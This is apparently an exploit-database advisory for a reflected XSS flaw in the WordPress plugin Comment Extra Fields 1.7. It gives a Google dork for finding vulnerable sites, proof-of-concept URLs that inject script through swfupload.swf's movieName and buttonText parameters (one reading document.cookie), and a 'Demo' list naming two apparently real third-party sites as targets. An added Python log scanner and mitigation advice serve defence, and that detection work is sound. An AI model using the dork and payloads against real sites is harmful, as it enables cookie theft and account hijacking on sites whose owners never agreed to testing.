Wordpress Plugins - Comment Extra Fields <== XSS



##################################################
# Description : Wordpress Plugins - Comment Extra Fields <== XSS
# Version : 1.7
# Link : http://wordpress.org/extend/plugins/comment-extra-field/
# Plugins : http://downloads.wordpress.org/plugin/comment-extra-field.1.7.zip
# Date : 8-1-2013
# Google Dork : inurl:/wp-content/plugins/comment-extra-field/
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################


# Description :
================
JavaScript code injection (XSRF/XSS).
A remote attacker can include remote images or execute JavaScript code via the reflected parameters.


# PoC
=====
=> XSRF/XSS Injection:
 http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('XSS');//
 http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
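
Detection example for the requests shown above. This is an added example, not part of the original advisory: it scans web server access log lines (combined log format) for hits on the bundled swfupload.swf whose movieName or buttonText parameter carries markup or script-like content, which is what the PoC URLs rely on. The log lines embedded below are constructed sample data; the IP addresses, timestamps and sizes are assumptions.

```python
"""Flag requests to the plugin's swfupload.swf that carry script-like
movieName / buttonText values (added example, not from the advisory).

All log lines in SAMPLE_LOG are constructed for this example.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Path of the vulnerable Flash file as given in the advisory.
SWF_PATH_RE = re.compile(r"/comment-extra-field/scripts/swfupload\.swf$", re.I)

# Parameters the advisory shows being reflected into the SWF's JavaScript.
WATCHED_PARAMS = ("movieName", "buttonText")

# Characters and tokens that break out of the expected string context or
# carry script: quotes, brackets, braces, tag delimiters, javascript: URIs.
PAYLOAD_RE = re.compile(r"""[<>"'\]\)\};]|javascript:|alert\(|document\.""", re.I)

# Combined log format: ip ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

SAMPLE_LOG = [  # constructed sample lines, IPs from documentation ranges
    '203.0.113.5 - - [08/Jan/2013:10:15:32 +0000] "GET /wp-content/plugins/'
    'comment-extra-field/scripts/swfupload.swf?buttonText=%3Ca%20href%3D%27'
    'javascript:alert(document.cookie)%27%3EClick%20me%3C/a%3E HTTP/1.1" '
    '200 11234 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Jan/2013:10:16:01 +0000] "GET /wp-content/plugins/'
    'comment-extra-field/scripts/swfupload.swf?movieName=%22%5D)%3B%7Dcatch(e)'
    '%7B%7Dif(!self.a)self.a%3D!alert(%27XSS%27)%3B// HTTP/1.1" '
    '200 11234 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [08/Jan/2013:10:17:45 +0000] "GET /wp-content/plugins/'
    'comment-extra-field/scripts/swfupload.swf?movieName=SWFUpload_0 HTTP/1.1" '
    '200 11234 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [08/Jan/2013:10:18:02 +0000] "GET /wp-content/plugins/'
    'comment-extra-field/scripts/swfupload.js HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
]


def inspect_line(line):
    """Return a finding dict for a suspicious swfupload.swf request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None  # not a parseable combined-format line
    parts = urlsplit(m.group("target"))
    if not SWF_PATH_RE.search(parts.path):
        return None  # some other resource, not the Flash file
    # parse_qs already percent-decodes once; keep_blank_values so an empty
    # parameter is still visible in the parsed result.
    params = parse_qs(parts.query, keep_blank_values=True)
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            decoded = unquote(value)  # second pass catches double-encoding
            if PAYLOAD_RE.search(decoded):
                return {
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "status": m.group("status"),
                    "param": name,
                    "value": decoded,
                }
    return None


def scan(lines):
    """Run inspect_line over an iterable of log lines, returning the findings."""
    return [f for f in (inspect_line(l) for l in lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['time']} {finding['ip']} {finding['param']}={finding['value']!r}")
```

The third and fourth sample lines show the two benign cases the filter must pass: a legitimate movieName value and a request for a different file in the same directory. Beyond detection, the usual mitigation is to remove or deny access to the stale swfupload.swf at the web server, since the Flash file is not needed for the plugin's comment fields to render.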


# Demo:
=======
http://cscmail.net/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>
http://fitest.sitewalla.com/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a>


# Thanks
=========
CyberSEC Team - TBD - 1337day - PacketStormSecurity
